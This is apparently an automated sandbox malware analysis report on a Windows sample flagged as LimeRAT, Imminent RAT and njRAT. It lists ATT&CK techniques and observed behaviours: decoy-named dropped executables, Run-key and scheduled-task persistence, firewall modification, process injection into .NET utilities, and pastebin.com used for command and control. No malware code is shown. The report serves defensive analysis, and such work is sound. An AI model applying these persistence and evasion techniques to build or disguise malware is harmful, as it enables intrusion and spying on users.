Malware Analysis Report

2024-09-11 10:02

Sample ID 240502-sb8hksbd3t
Target 0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118
SHA256 62598bb2bcf8af2ca769137e1a4021256154a6430e95edc5ddee02c4891618a0
Tags
imminent limerat njrat evasion persistence rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

62598bb2bcf8af2ca769137e1a4021256154a6430e95edc5ddee02c4891618a0

Threat Level: Known bad

The file 0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

imminent limerat njrat evasion persistence rat spyware trojan

LimeRAT

Imminent RAT

njRAT/Bladabindi

Modifies Windows Firewall

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Maps connected drives based on registry

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

AutoIT Executable

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Impair Defenses
T1562
Disable or Modify System Firewall
T1562.004
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-02 14:58

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-02 14:58

Reported

2024-05-02 15:01

Platform

win7-20240221-en

Max time kernel

145s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe"

Signatures

Imminent RAT

trojan spyware imminent

LimeRAT

rat limerat

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A
N/A N/A C:\Users\Admin\secinit\sdchange.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe N/A
N/A N/A C:\Users\Admin\secinit\sdchange.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe" C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2500 set thread context of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2696 set thread context of 1972 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2084 set thread context of 1704 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 1100 set thread context of 1976 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2036 set thread context of 2528 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2136 set thread context of 2636 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2180 set thread context of 2276 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2324 set thread context of 2232 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 636 set thread context of 2256 N/A C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2696 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2696 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2696 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 2696 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2696 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2696 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2696 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2696 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2696 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2696 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2696 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2500 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
